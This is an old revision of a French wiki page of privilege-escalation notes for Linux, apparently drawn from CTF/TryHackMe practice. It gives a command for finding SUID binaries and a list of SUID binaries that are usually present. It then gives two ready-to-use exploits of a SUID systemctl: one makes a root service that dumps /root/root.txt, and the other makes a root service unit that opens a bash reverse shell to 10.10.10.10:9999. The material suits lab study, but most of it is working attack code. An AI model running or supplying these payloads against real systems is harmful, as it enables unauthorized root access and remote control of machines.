procedures:privesc_gnu_linux
This is an old revision of the document!
Table of Contents
Privesc GNU/Linux
SUID
find / -user root -perm -4000 -print 2>/dev/null
Liste des SUID courants
/bin/fusermount /bin/mount /bin/ntfs-3g /bin/ping /bin/ping6 /bin/su /bin/umount /sbin/mount.cifs /usr/bin/chfn /usr/bin/chsh /usr/bin/gpasswd /usr/bin/newgidmap /usr/bin/newgrp /usr/bin/newuidmap /usr/bin/passwd /usr/bin/pkexec /usr/bin/sudo /usr/lib/dbus-1.0/dbus-daemon-launch-helper /usr/lib/eject/dmcrypt-get-device /usr/lib/openssh/ssh-keysign /usr/lib/policykit-1/polkit-agent-helper-1 /usr/lib/snapd/snap-confine /usr/lib/squid/pinger /usr/lib/x86_64-linux-gnu/lxc/lxc-user-nic
SUID systemctl
https://gtfobins.github.io/gtfobins/systemctl/
https://medium.com/@klockw3rk/privilege-escalation-leveraging-misconfigured-systemctl-permissions-bc62b0b28d49
https://www.jil-wright.com/blog/tryhackmevulnversity
cd /bin sh sh -p echo '[Service] Type=oneshot ExecStart=/bin/sh -c "cat /root/root.txt > /tmp/output.txt" [Install] WantedBy=multi-user.target' > $TF ./systemctl link $TF ./systemctl enable --now $TF cat /tmp/output.txt
[Unit] Description=roooooooot [Service] Type=simple User=root ExecStart=/bin/bash -c 'bash -i >& /dev/tcp/10.10.10.10/9999 0>&1' [Install] WantedBy=multi.user.target
procedures/privesc_gnu_linux.1621873030.txt.gz · Last modified: 2021/05/24 18:17 by didzkovitchz